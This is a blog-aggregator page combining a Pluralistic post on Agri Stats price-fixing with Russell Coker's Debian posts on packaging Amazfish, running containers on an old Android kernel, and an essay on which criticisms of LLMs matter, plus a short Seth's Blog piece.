How do they rig those prices? After all, it's very illegal for these four companies to get together around a table to rig prices. Instead, they use a "price consultancy" called Agri Stats that does the price-rigging for them. Every week, the packers send a detailed list of all their costs and prices into Agri Stats, and Agri Stats "advises" them all to raise all their prices at once, and anyone who doesn't play along is pushed out of the Agri Stats cartel. Everyone wins – except families paying for groceries:

https://pluralistic.net/2023/10/04/dont-let-your-meat-loaf/#meaty-beaty-big-and-bouncy

Agri Stats has been doing this since the Reagan years, but they grew steadily more brazen, until, back in 2023, Biden's DOJ brought history's most obvious, easily won antitrust case against them:

https://www.meatpoultry.com/articles/29124-doj-sues-agri-stats-for-complicity-in-meat-market-manipulation

And wouldn't you know it, Trump just settled that case, in a way that will make Agri Stats much, much richer and give them far more opportunities to rig prices:

https://prospect.org/2026/05/08/meat-industry-agri-stats-department-of-justice-price-fix-trump/

Under the terms of the settlement, Agri Stats must "allow" restaurants, farmers, and other parts of the supply chain to pay it for the data it consolidates. This will allow more parties to collude to rig prices, and provide more income to Agri Stats. As David Dayen writes in The American Prospect, they've been "sentenced to make money."

Agri Stats isn't the only "price consultancy" that is used to launder a price-fixing cartel that's driving up the cost of living for all Americans, including Trump's base, in order to make oligarchs better off. Companies like Realpage do the same thing for residential rents:

https://pluralistic.net/2024/12/11/nimby-yimby-fimby/#home-team-advantage

Trump can't do anything about any of these scams, not without goring some oligarch's precious ox. But, as Dayen points out, there are dozens of Democratic state Attorneys General who can kill Trump's sweetheart deal for Agri Stats using the Tunney Act, which gives them standing to sue to force a federal judge to review the settlement and determine whether it is fair.

Whether any AG will seize the moment remains to be seen, of course, but it would be very good politics to do so – after all, the path to political power in America runs through credible promises to do something about the cost of living crisis.


Hey look at this (permalink)

'The Biggest Student Data Privacy Disaster in History': Canvas Hack Shows the Danger of Centralized EdTech https://www.404media.co/the-biggest-student-data-privacy-disaster-in-history-canvas-hack-shows-the-danger-of-centralized-edtech/



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago A dotcom founder's tale (funny) https://features.slashdot.org/story/01/05/04/1541239/the-worst-of-times

#20yrsago Shell UK abandons chip-and-pin after £1M fraud https://web.archive.org/web/20060508044110/https://www.snakeoillabs.com/2006/05/07/shell-stops-accepting-chip-and-pin-in-fraud-fiasco-bp-to-follow/

#15yrsago Typewriter bust: Grandfather https://web.archive.org/web/20110511033756/http://jemayer.tumblr.com/post/5260317696

#10yrsago Kobo “upgrade” deprives readers of hundreds of DRM-locked ebooks https://www.teleread.com/drm-nightmare-after-recent-upgrade-kobo-customers-report-losing-sony-books-from-their-libraries/

#10yrsago Venerable hacker zine Phrack publishes its first issue in four years https://phrack.org/issues/69/1

#10yrsago Panama Papers whistleblower issues statement, naming and shaming failed states and institutions https://web.archive.org/web/20160506180902/https://panamapapers.icij.org/20160506-john-doe-statement.html

#5yrsago The FTC's (kick-ass) Right to Repair report https://pluralistic.net/2021/05/07/pro-act-class-war/#we-fixit

#5yrsago The PRO Act and worker misclassification https://pluralistic.net/2021/05/07/pro-act-class-war/#sectoral-balances

#1yrago Mark Zuckerberg announces mind-control ray (again) https://pluralistic.net/2025/05/07/rah-rah-rasputin/#credulous-dolts


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers.

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification: Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), First Second, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus, Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

13:56

Russell Coker: Packaging Amazfish for Debian [Planet Debian]

I have done some packaging work on Amazfish (the smart-watch software that works with the PineTime among others) for Debian. Here is my Git repository for libnemodbus (a dependency for Amazfish that isn’t in Debian) [1]. Here is my Git repository for Amazfish itself [2].

These packages currently use Qt 5, which is a good reason not to upload them now, as the transition to Qt 6 is in progress. Patching them to work with Qt 6 (as the libnemodbus upstream is apparently not migrating to Qt 6 yet) shouldn't be that difficult, but it is something that needs some care and communication to get right.

Running this package on my laptop with my PineTime (which worked very reliably when run by GadgetBridge on Android) wasn’t reliable and the PineTime would disconnect and refuse to connect again. Doing it on the Furilabs FLX1s gave a similar result. If Amazfish was the only Bluetooth program having problems on my laptop and on my FLX1s then I’d blame it, but both those systems have some other Bluetooth issues.

Running this on my laptop, Amazfish would send its own test notifications to my watch, but system notifications (from notify-send among others) wouldn't get sent. Running it on my FLX1s, I got ONE notification from my network monitoring system sent to my watch before my phone and watch stopped talking to each other.

To make things even more difficult for me the harbour-amazfish-ui program doesn’t work correctly with the libraries installed on my FLX1s and doesn’t display the content of many screens but it works correctly when running in a container environment with stock Debian/Testing.

Below is the script that I’m currently using to launch apps in a Debian/Testing container on my FLX1s. The comment about unshare-user doesn’t apply to this version of the script but I left it in to avoid the potential for future confusion. The Furilabs people diverted the bwrap binary and have a wrapper that removes a set of parameters that they think will cause problems.

#!/bin/bash
set -e

BUILDBASE=/chroot/testing

# bwrap: Can't mount proc on /newroot/proc: Device or resource busy
# get the above with --unshare-user and --unshare-pid
# Bind the host's /tmp, /run and home directory into the container,
# overlay the Debian/Testing chroot's /etc, /usr and /var/lib read-only,
# and recreate the usual top-level symlinks, /proc and /dev.
exec bwrap.real \
    --bind /tmp /tmp \
    --bind /run /run \
    --bind $HOME $HOME \
    --ro-bind $BUILDBASE/etc /etc \
    --ro-bind $BUILDBASE/usr /usr \
    --ro-bind $BUILDBASE/var/lib /var/lib \
    --symlink usr/bin /bin \
    --symlink usr/sbin /sbin \
    --symlink usr/lib /lib \
    --proc /proc \
    --dev-bind /dev /dev \
    --die-with-parent \
    --new-session \
    "$@"

Due to the range of problems I'm having, I think it would be best to pass this package on to someone else who has a different test setup. It could be that further testing will reveal that my issues are related to bugs in Amazfish, but I can't prove it either way at this time. Maybe a smart watch other than a PineTime would work more reliably, but it seems most likely that my laptop and phone are to blame. I can't make more progress on this now.

12:21

Russell Coker: Bad Criticism of LLMs (not AI) [Planet Debian]

Discussion of “AI” systems seems to be dominated by fears of uncommon and unlikely threats. I think that we should be focusing more on real issues with LLMs and with society in general and put the most effort towards the biggest problems.

It’s Not AI

True Artificial Intelligence [1] (i.e. a computer that has the mental capacity of a household pet) is something that I think can be developed, but it hasn't been developed and we don't have good plans for developing it. We seem to be a lot further from achieving that goal than we were from landing on the moon in 1962 when JFK gave his historic speech.

What we have is a variety of pattern recognition systems that can predict what fits into a pattern. The most well known type of Machine Learning (ML) system is the Large Language Model (LLM), meaning ChatGPT and similar systems which predict which text is likely to come next and can make an essay from it. They can give interesting and useful output, but there is no thought behind it; it's just a better form of Eliza (the famous program from 1964 that simulates conversation by pattern matching) [2]. By analysing billions of documents, storing the data in a condensed mathematical form, and then using computation to extract from that record, LLMs can produce output that is unfortunately considered by some people to be good enough to include in legal documents submitted to courts, university assignments, and many other documents. But they do so without even the thinking ability of a mouse.
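The gap between pattern matching and thinking is easy to demonstrate. Below is a minimal Eliza-style responder (the rules are my own illustration, not the 1964 original's script): a few regular expressions and canned templates produce plausible-looking conversation with no understanding at all.

```python
import re

# Each rule is (pattern, response template); {0} is filled with the
# matched text. Purely surface-level pattern matching, no comprehension.
RULES = [
    (re.compile(r"\bI am (.+)", re.I), "Why do you say you are {0}?"),
    (re.compile(r"\bI feel (.+)", re.I), "How long have you felt {0}?"),
    (re.compile(r"\bbecause (.+)", re.I), "Is that the real reason?"),
]

def respond(text):
    """Return a canned reply for the first matching rule."""
    for pattern, template in RULES:
        match = pattern.search(text)
        if match:
            return template.format(*match.groups())
    return "Please tell me more."
```

An LLM does something mathematically far richer, predicting likely continuations from billions of documents, but like Eliza it produces the form of understanding rather than understanding itself.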

To call current systems “AIs” without any significant qualifiers when criticising them is to concede the debate about the worth of such things.

If we develop AIs that can actually think we will have to deal with the issues in the SciFi horror short story Lena by qntm [3].

The Bad Arguments

Here is a list of some of the most unreasonable arguments I’ve seen against “AI” which distract attention from real problems both related to “AI” and other problems in society.

Suicide and Homicide

Wikipedia has a page listing Deaths Linked to Chatbots [4], which right now has 16 entries from 2023 to Feb 2026. They are all tragedies, and as a society we should try to prevent such things. But what I would like to see from the media is some analysis of overall trends. Yes, it gets people's attention when someone dies in an unusual way, but we need attention paid to the more numerous deaths which are preventable. It has become standard practice to give information on Lifeline in media referencing suicide; it would be good if they also developed a practice of mentioning the relative incidence of a problem when publishing an article about it.

One of the many factors that cause more suicides than chatbots is school. Scientific American has an informative article from 2022 about the correlation between child suicide and school [5]. It is based on US statistics and shows that the lowest suicide rate is in July (a no-school month in the US), at 2.3 per 100,000 person-years. So if kids had a quality of life equivalent to July all year round there would be 2.3 suicides per 100,000 kids every year, while if they had a quality of life equivalent to a Monday in January or November there would be 3.9 suicides per 100,000 kids every year. The article states: "Any time I present these data to teachers, parents, principals or school administrators, they are shocked. This should be common knowledge." It is common knowledge to anyone who takes any notice of what happens in schools, but paying attention to serious problems is unpleasant; it's more fun to pretend that school is good for everyone. No parent wants to think that they sent their child to a place that was horrible, and no teacher wants to think that they are part of a system that harms kids.

The US CDC has an informative article about youth suicide [6] which documents it as the 3rd largest cause of death in the 14-18 age range for 2021. This article was published in 2024 and based on statistics from 2023 and earlier. It notes significant differences in suicides, attempts, and "persistent feelings of sadness or hopelessness", with girls at more than twice the rate of boys and "LGBQ+" kids at more than twice the rate of "heterosexual" students. It seems obvious that misogyny and homophobia are correlated with suicide, and that's something that could and should be addressed in schools. My state has a Safer Schools program [7] to try to alleviate the problems related to homophobia, but I expect that things are getting worse in the US in that regard. 39.7% of kids in US high schools had "persistent feelings of sadness or hopelessness" before LLMs became popular. School could and should be a happy time for the vast majority of kids, but instead almost half of them don't enjoy it, and a majority of girls and "LGBQ+" kids don't. Having no mention of trans kids is a significant omission from that article; based on everything I've heard from trans people I expect that their statistics would be even worse.

One could argue that the small number of deaths inspired by use or misuse of LLMs is an indication of a larger number of people suffering in ways that don’t result in death and don’t get noticed. But I don’t think that can compare to the fact that the majority of girls and “LGBQ+” kids have “persistent feelings of sadness or hopelessness” in the current school system.

Regarding homicide, the Australian Institute of Criminology has an article showing that in the 2003-2004 period 49% of homicides of women were attributed to a "domestic argument" [8]; that's something that could and should be addressed. That article counted 308 homicide victims in that period, which is larger than the world-wide death toll linked to LLMs but also less than a third of the death toll from car accidents in Australia. Australia has less than 0.4% of the world population and a fairly low homicide rate, yet its number of homicides vastly outnumbers all the world's homicides related to LLMs.

I think it’s great to address any cause of suicide or homicide, but devoting government resources and legislation towards very uncommon causes instead of things that happen every day is not a good strategy. It would be fine to address all factors leading to suicide, but problems with the school system have been a major factor for decades with little effort applied to fix it.

Fraud and Other Crime

There is evidence of criminals using LLMs to help prepare for crimes: the ability to generate large amounts of text quickly can be used for fraud and extortion. This is going to be a serious problem and we need structural changes to society to deal with it. There is an ongoing issue of scammers convincing older people that their child or other young relative is in trouble and that a large amount of cash is required to address it. This sort of scam, as well as the better known "Nigerian" scams, will probably become more common as the cost of running them decreases. This may be more of a problem for people in developing countries, as currently a common scam business model is to have people in regions where wages are low (such as Pakistan, for one scammer I spoke to) target people in relatively wealthy countries like Australia, so that an attack with a low probability of success is financially viable. Cheaper attacks will make less affluent victims financially viable to the scammers.

While writing this post I received a financial scam phone call, run by an "AI" chat system, trying to get me to invest in SpaceX. I expect to receive more of them, and this is something that needs to be dealt with via both technical measures and legislation.

Do we have to accept less freedom and less anonymity in finances as a cost of reducing financial crime? Greater restrictions on the use of cash would make some crimes more difficult or less profitable for criminals. As a society I think we need to have a discussion about a balance between financial freedom and freedom from criminal exploitation, failing to have such a discussion is likely to lead to policies which don’t work well.

Also, one thing that ML systems are good at is recognising patterns in data. Banks could scan all their transactions and look for patterns that correlate with fraud. They currently do this badly, doing things like locking credit cards when someone goes to another country and spends money. They could do a better job of that and involve the police in cases of obvious fraud even when the customer doesn't realise that they are a victim.
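As a toy illustration of the principle (not any bank's actual method), even a simple statistical baseline beats crude rules like "lock the card when the country changes": flag a transaction when it sits far outside the account's established spending pattern.

```python
from statistics import mean, stdev

def is_suspicious(history, amount, threshold=3.0):
    """Flag `amount` if it is more than `threshold` standard deviations
    from the account's historical mean spend.
    A toy z-score baseline, not a production fraud model."""
    if len(history) < 2:
        return False  # not enough data to establish a pattern
    mu = mean(history)
    sigma = stdev(history)
    if sigma == 0:
        return amount != mu  # flat history: anything different stands out
    return abs(amount - mu) / sigma > threshold
```

Real systems use far richer features (merchant, time, location) and learned models, but the idea of scoring deviation from an established pattern is the same.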

This isn’t a reason to criticise “AIs”, it’s a reason to plan defensive technology that matches the capabilities of attackers.

As an aside I used to work for a company that was developing “AI” software to scan bank phone calls and allow banks to recognise employees who acted illegally. Unfortunately the Royal Commission into banking misconduct [9] didn’t impose any penalties that gave the banks a financial reason to avoid criminal activity.

Unemployment and Inequality

There are many claims about AI systems making large numbers of jobs obsolete. Some of them are outlandish, such as the claim that all white-collar jobs will be obsolete in the near future. There are some reasonable claims, like the ability to replace some mundane jobs.

Replacing jobs that suck with computers, robots, and other machinery is a good thing! Very few people wish that they were working on a farm without a tractor. In 1900 it’s estimated that between 60% and 70% of the world labour force worked in agriculture and 40% of the US labour force did so. Now it’s something like 27% globally and between 1% and 3% in developed countries. Automated factories are also a good thing, it’s best to avoid boring and dangerous work.

The most plausible claims about job replacement by "AI" concern jobs that involve analysing and summarising documents. One example that comes to mind is the worst kind of journalism, where press releases from companies are massaged into the format of a feature article. I don't think anyone wants that sort of job, and doing it with "AI" hopefully means no human has to sign their name to it.

For work like programming, few people will be directly replaced by "AI", but if people can do their work more efficiently while using it then fewer people are required. I don't think that any programmer likes the part of their job where they have to skim-read long documents looking for a clue about how to solve a problem with a library or protocol. An LLM processing the document and finding the potentially useful parts takes away the drudgery and allows greater productivity.

The trend in replacing people has been to make the remaining people work longer. If you force all employees to work 60-hour weeks then that can theoretically allow hiring fewer people than 40-hour weeks would. For some work that applies, but for skilled work it mostly doesn't, as productivity and work quality on average drop when people work more than 40 hours in a week.

Another trend for exploiting people is having a low minimum wage and making accommodation expensive, so that many people need to work two jobs. What we need is legislation to restore the situation of the 70s, when a single full-time job was sufficient to provide for a family. The low minimum wage and high expenses for many things are a problem that has been slowly developing over decades while being mostly ignored by journalists. If they concentrated on the real issues that are hurting workers today they could incite political action to fix these problems.

Academic Cheating

There is no shortage of ways to cheat in school and university. There are people who are paid to write essays, mobile phones are used for cheating in exams, etc. Getting an "AI" to write essays makes it easier to cheat on the essay-writing part, but does so with lower quality and in a less stealthy way.

What’s the worst case scenario? That we have to change to oral exams for all university subjects?

In the US the average annual price for university tuition is apparently $25,000. If each student had individually supervised assessment for their exams at a cost of $100 per hour, it would make the degree cost about 4% more. The cost of university in the US is unreasonably high and that's a problem that needs to be fixed, but a hypothetical 4% price increase isn't going to be a major part of it.
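The 4% figure works out if you assume roughly ten hours of individually supervised assessment per student per year (the hours figure is my assumption, not from the post); the arithmetic is just:

```python
tuition = 25_000       # average annual US tuition, per the post
hourly_rate = 100      # cost of supervised assessment, dollars per hour
hours_per_year = 10    # assumed hours of oral exams per student per year

extra_cost = hourly_rate * hours_per_year  # dollars of added cost per year
increase = extra_cost / tuition            # fraction of tuition, i.e. 4%
```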

Weak Arguments Against “AI”

Computer Security Attacks

There have been many claims that "AI" will break the security of all systems and cause the type of disruption that was previously predicted for the year 2000. Bruce Schneier has written a good analysis of the issues, including how "AI" can be used by both attackers and defenders [10]. He doesn't have a strong conclusion on whether the net result will be good or bad, but his article does make it clear that the result is not going to be a total disaster.

While I was working on this post I read another post by Bruce Schneier that was significantly more negative about this issue [11]. While I still don’t think this will destroy civilisation I found his other post convincing enough to move computer security from the bad argument section to the weak argument section.

Spidering the Web to Death

There are issues of bots from "AI" companies doing a bad job of trying to download all the Internet's content and using a lot of resources. When it was just the major search engines and the Wayback Machine doing it, the load was small, because a small number of organisations had evolved good crawling practices over many years. Now we have a lot of idiots doing it badly and repeatedly hitting generated content.

This is really annoying but is something that we can deal with. Currently my blog and many other sites are hosted on a Hetzner server with an E3-1271 v3 CPU and 32GB of RAM, and there are occasions where more than half the CPU power is being used to service web requests from such systems. Even on "server bidding" (renting servers previously used by other customers) Hetzner isn't offering systems that slow nowadays; the slowest they offer is about 20% faster than that. This is something that can be dealt with by spending a little more on hosting until the companies doing that go bankrupt.

I’m sure this is a serious problem for some people, but for most people it’s not a big deal. Also hostile traffic on the Internet is something we have all had to deal with as a part of life since the mid to late 90s.

RAM Prices

The unreasonably high prices for RAM are annoying and hurt the development of useful computer projects. Big companies can afford it: even with current high prices and the large quantities of RAM used in some servers, the cost still isn't significant to them. But it is a major issue for hobbyists and small projects. Things like setting up a dozen test VMs for FOSS development are now too expensive for many people who develop software in their spare time.

But this is a temporary thing: if AI companies were to keep buying RAM at high rates for a few years, manufacturers would just make more of it to meet demand. In some situations capitalism can work.

Environmental Damage

There are many people claiming that the power used by data centers for "AI" will lead to environmental damage, consuming power and water where there isn't enough.

The trend in computer hardware is to get smaller and faster. It hasn't been going as fast as it used to in many areas, but it hasn't stopped either, and it's an exponential trend. There has been an increase in data centers (DCs) for "AI" use because demand has been increasing faster than the hardware gets smaller. Eventually demand will stop outpacing advances in hardware and software, and the size of DCs will decrease.

As the production of renewable energy increases, the environmental cost of energy-hungry industries decreases. In a few years this won't be an issue anyone is bothered about.

False Claims About Danger as PR

Jamie McClelland makes an interesting claim that the AI companies are pushing the dangers of "AI" as a method of PR [12]. That seems plausible, and combined with the tendency of many journalists to just massage company press releases into articles, it could be the reason for a lot of the bad arguments against AI.

Good Arguments Against AI

Spam Everywhere

I’ve previously written about Communication and Hostile AIs [13]. I think that filling all communication channels with rubbish is a denial of service attack against society.

In the past communication took some effort; even the simplest email directly targeted at the recipient took some human effort, and that reduced its frequency. I get a lot of spam saying something like “I see your web site doesn’t rank in the top for Google searches” when my web site in fact rates well (the actor named Russell Coker ranks below me), so I know that such spam hasn’t had even a minimum of human involvement. Now a spammer who wants to do a better job can have an LLM write spam for every target, so each message is specifically aimed at the recipient, takes much longer for a human to recognise as spam, and avoids most anti-spam software.

Searching for businesses used to be easy: the phone book had listings for them, there was a real cost to being in the book, and humans actively tried to stop fraud. Creating fake web sites to get business isn’t too difficult, but it’s also not trivial at the moment, and such fake sites won’t look complete. With LLMs it’s now possible to create hundreds of sites that have content and look reasonable without human involvement. Instead of the small number of suicides and homicides inspired by “AI” chat systems, we should probably be more concerned about people who need psychological or medical advice being misled by bogus web sites created as part of fraud campaigns. Imagine people searching for mental health assistance finding web sites run by cults who oppose psychology as a profession. Imagine people searching for basic medical advice, such as how to cook a healthy meal, getting sucked into web sites that start sane and then lead people to Ivermectin as a universal medicine.

LLMs have the potential to take spam from quick and simple attacks to large scale targeted fraud aimed at people and organisations that don’t have the resources to defend against it. There have been many reports of CEO impersonation fraud against major corporations aiming to steal hundreds of thousands of dollars, and of fraud against individuals who are persuaded to hand over amounts like $50,000 to help a relative who is allegedly in a difficult situation. But if every corner store experienced the same type of attack that CEOs experience, and if every child had someone trying to steal their pocket money in the same way that relatively wealthy people are being targeted now, it would really change things.

David Brin wrote an insightful and informative blog post about this focusing on how “AI” generated content is being allowed to destroy YouTube [14].

Deep Fakes

There is some overlap between filling all communications channels with rubbish (fake news etc) and deep fakes. Making a fake photo of a politician or celebrity to lobby for legislative changes is a real issue, but it’s not what most people think of when the term “deep fake” is used.

Faked photos and videos targeting non-consenting people are a serious issue. It’s not just fake porn (which is a major issue and will cause some suicides); there are many other possibilities. Fake videos showing behaviour that justifies sacking people from their jobs are going to become an issue, and for people in public facing positions even proof that the videos are fake won’t necessarily help them.

Will we find ourselves in a situation where every politician gets deep-fake porn made of them and the only people who run for public office are ones who are cool with that? Will positions of leadership in the technology industry be restricted to people who aren’t bothered by having the most depraved fake porn made of them?

The Justice System

We have seen a lot of evidence of bias in law enforcement and the court system leading to bad results. The Innocence Project attempts to correct that, and its web site documents some of the things that have gone wrong [15]. Using “AI” systems to do some of the work of law enforcement, by training computers on the flawed results of current systems, can entrench bias and also make it harder to spot.

When determining whether someone should be considered a suspect or whether a prisoner should be eligible for parole, the number of factors a human can use is limited. But a computer can take many more factors into account, so the issue of whether inappropriate factors are being used can be masked. Computers are also unable to genuinely explain the decisions they make, while being able to come up with convincing fake reasons for them.

In the past there were racist policies in the US of banks not lending to people living in suburbs where most houses were owned by non-white people; those policies were documented, and the documents have become part of the historical record of racism. If an LLM decides not to lend money to people based on mathematical correlations derived from historical banking practices, it could assign negative weights to factors such as non-English names and implement the racism in a large array of numbers with no proof.

The current cases of lawyers getting LLM systems to do some of their work, and having their incompetence revealed when the computer generated work is shown to be ridiculously bad, are amusing. But that is not the real problem. The real problems will start when the computers in police cars start flagging every car owned by a non-white person as having “probable cause” for a drug stop.

Technically Not Financial Fraud

The majority of the ecosystem around “AI” is a financial scam [16]. There are companies and individuals doing good things with machine learning, some of which is based on hardware and software developed as part of this ecosystem. But the majority of it has no plausible path to profits, and its future inevitably ends with some bankruptcies. There are circular flows of money that loop in the major cloud providers and NVidia; when the values of these companies correct, it will become apparent that they have all burned a lot of money keeping this running and that the senior people have all taken a share of it (the entire purpose of stock options is to allow senior people to suck money out of the company). Then every cloud provider will increase costs while under chapter 11, and all the companies that depend on them will pay whatever it takes. That includes all major companies and most governments. Unlike the dot-com boom and crash and the housing crash, the coming financial crash will impact every company that we deal with and most governments. So the people in first-world countries will effectively be taxed to pay for this scam while the executives go party in Monaco. This may seem like an extreme claim, but it all happened before with the dot-com crash and the housing market crash.

The CEO class has an ongoing practice of doing things that aren’t crimes because they lobby (bribe) politicians to make them legal. So the current stock market shenanigans around “AI” don’t seem to involve things that governments consider to be crimes. But any normal person might be surprised to learn that such things are legal and most people would vote for such things to be crimes if they had the opportunity.

A global financial crisis is the least of the problems that seem likely to afflict society from “AI” systems. But it will be more immediately obvious when it happens – which could be this year!

Propaganda

Creating art requires skills that the type of people who want to create propaganda tend to lack. “AI” technologies allow creating “art” based on mathematical models of actual art, tailored to the requirements of the person running the program.

I have seen the term “AI Fascism” used to describe the use of “AI” to help authoritarian governments. I am dubious about whether it deserves that term; while every article I’ve read on the topic has had some good points, I thought all the arguments were weak.

But there are lots of ways that governments can abuse their populations without going full fascist. In the last century there were lots of truly terrible governments that didn’t even make the top 10 of fascism.

AI Sycophants

Bruce Schneier wrote an informative blog post about AI Chatbots and Trust which focused on sycophantic chatbots [17]. We have seen a lot of evidence of terrible behaviour and stupid decisions from rich people due to having no negative consequences for bad choices. The vast majority of the history of kings concerns bad decisions made by such people. A future where middle class and poor people can make the same bad decisions as rich people wouldn’t be good.

Good Things About ML

Machine Learning (abbreviated as ML) can do useful things. It’s not just Large Language Models (LLMs) such as ChatGPT etc. There are also ML systems that can analyse images and other data sets.

I have found ChatGPT to be very useful for making suggestions for improving blog posts. I don’t get it to write anything, I just ask for suggestions. It has pointed out things that I missed, such as when I didn’t include the price when reviewing a car: the car in question was much more expensive than I will ever pay, so the price wasn’t relevant to me, but it would be to some readers. It has also made useful suggestions about the structure of blog posts, repeated points, and having a good conclusion. It has some downsides, which include trying to erase my voice from my writing, such as suggesting that the rhetorical question “does email suck?” is unprofessional.

I have worked for a company that used ML systems to analyse driver performance and alert people if a driver is falling asleep, using a phone, or otherwise seems unable to drive safely. Their business model involved a human reviewing the images of drivers the computer flagged and then determining who was actually doing the wrong thing. This seems like a good use of the technology.

I have also worked for a company that used ML systems to analyse the performance of bank employees and detect potentially fraudulent behaviour. Preventing crime seems to be clearly a good thing and in this case the manager of the employee in question would review the evidence to make sure that they weren’t being falsely accused.

Conclusion

I don’t think that the problems with managing the changes that so called “AI” is introducing are particularly new. An example of how society handles change that’s worth considering is car safety. The seat belt first became mandatory for aeroplanes in some jurisdictions in 1928. The Model T Ford, widely regarded as the car that created the mass market, was released in 1908 and stayed in production until 1927. So if society acted in a reasonable way, seat belts would have been a standard feature for most of the history of mass market cars. However seat belts were first made compulsory in 1970 in Victoria, Australia, and there are still people who think that they are safer without seat belts! The delayed adoption of seat belts is only one example of needless deaths caused by not taking reasonable measures for car safety, but it’s one that’s easy to demonstrate and measure.

The difference between past problems like car safety and the current problems of “AI” is that the “AI” problems will be more pervasive. Most of my history as a car driver and passenger was in cars much less safe than those made in the last 10 years. But partly through luck I’ve never been in a serious crash, so being in cars that would have given me a low probability of surviving a freeway speed crash didn’t affect me. There is no combination of luck and skill by which someone could avoid the downsides of “AI”. If nothing else the results of elections will be affected, and no-one can avoid that.

As a society we really need to address the real issues related to “AI” which in some cases requires legislation.

10:14

The narrow window of redemption [Seth's Blog]

Where did the five-second rule come from?

Science makes it clear that if disgusting germs are going to go from the floor to your toast, it’s going to take less than five seconds for that to happen.

It might as well be the four-minute rule as far as food safety goes.

But it’s compelling and universal. A chance to fix a relatively small error, one associated with an outcome you were hoping for.

Innovation involves lots of failure, but we rarely encourage ourselves to adopt a five-second rule when we’re brainstorming, inventing or developing what’s next.

Please do.

Tiny mistakes are fixable. Avoiding them is how we get stuck.

10:00

Russell Coker: Systemd, Mobile Linux, and Containers [Planet Debian]

I’ve had some problems running apps I want on my Furilabs FLX1s [1], so I decided to install some container environments to test various versions. I started with Debian/Testing so I can test the build process for some packages I’m about to upload to Unstable.

Systemd Issues

When running “debootstrap testing testing” to set up the chroot, the process aborted with errors, including the following from the systemd postinst:

Failed to enable units: Protocol driver not attached.
Cannot open '/etc/machine-id': Protocol driver not attached

This turned out to be from trying to run systemctl in the postinst. I just removed the “set -e” line from /chroot/testing/var/lib/dpkg/info/systemd.postinst and kept on going (I’m not planning to actually use systemd, so its failure to set up wasn’t a problem).

Then I installed a bunch of -dev packages needed to build my package which had a dependency chain that included udev leading to the following error:

Setting up udev (260.1-1) ...
Failed to chase and open directory '/etc/udev/hwdb.d', ignoring: Protocol driver not attached
Failed to chase and open directory '/usr/lib/udev/hwdb.d', ignoring: Protocol driver not attached

Udev is also a part of systemd.

Googling this turned up a closed systemd bug indicating that systemd has a minimum kernel version of 5.10 [2]. The Furiphone has kernel 4.19.325-furiphone-radon due to being based on Android.

Checking the kernel version isn’t that hard to do. If the systemd programs in question checked the version and reported “can’t run on kernels prior to 5.10” it would avoid a lot of confusion – and also bug reports that the systemd developers don’t want.
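As a sketch of the kind of gate being suggested (illustrative only, not systemd’s actual code; the function name and parsing are made up for the example):

```python
# Sketch of a kernel version gate like the one the post suggests
# systemd could apply. Illustrative only, not systemd's real check.
import re

MINIMUM = (5, 10)  # systemd's reported minimum kernel version

def kernel_too_old(release: str, minimum: tuple = MINIMUM) -> bool:
    """True if a kernel release string like '4.19.325-furiphone-radon'
    predates `minimum`."""
    match = re.match(r"(\d+)\.(\d+)", release)
    if match is None:
        return False  # unparseable release: don't block
    return (int(match.group(1)), int(match.group(2))) < minimum

# The Furiphone's Android-derived kernel fails the check:
print(kernel_too_old("4.19.325-furiphone-radon"))  # True
```

A program could print a clear “can’t run on kernels prior to 5.10” message when this returns true instead of failing with “Protocol driver not attached”.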

Some Debian package dependencies can probably do with revision. Installing the packages “libkdb3-dev libkf5archive-dev qtdeclarative5-dev qtpositioning5-dev qttools5-dev” ideally wouldn’t have a dependency chain leading to udev.

The Furilabs people appear to have patched the latest Debian version of systemd to work with the older kernels, the version is currently 260.1-1+furios0+git20260425023744.8401044.forky.production.

Compile Times

I got this working by editing every postinst script and either removing the “set -e” or adding an “exit 0” at the top. I don’t need things to be configured properly for a running OS, I just need the files in the right locations for a container.
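The blanket workaround described above can be sketched in a few lines of Python (an illustrative sketch, not the exact commands used; the chroot path and function name are made up for the example):

```python
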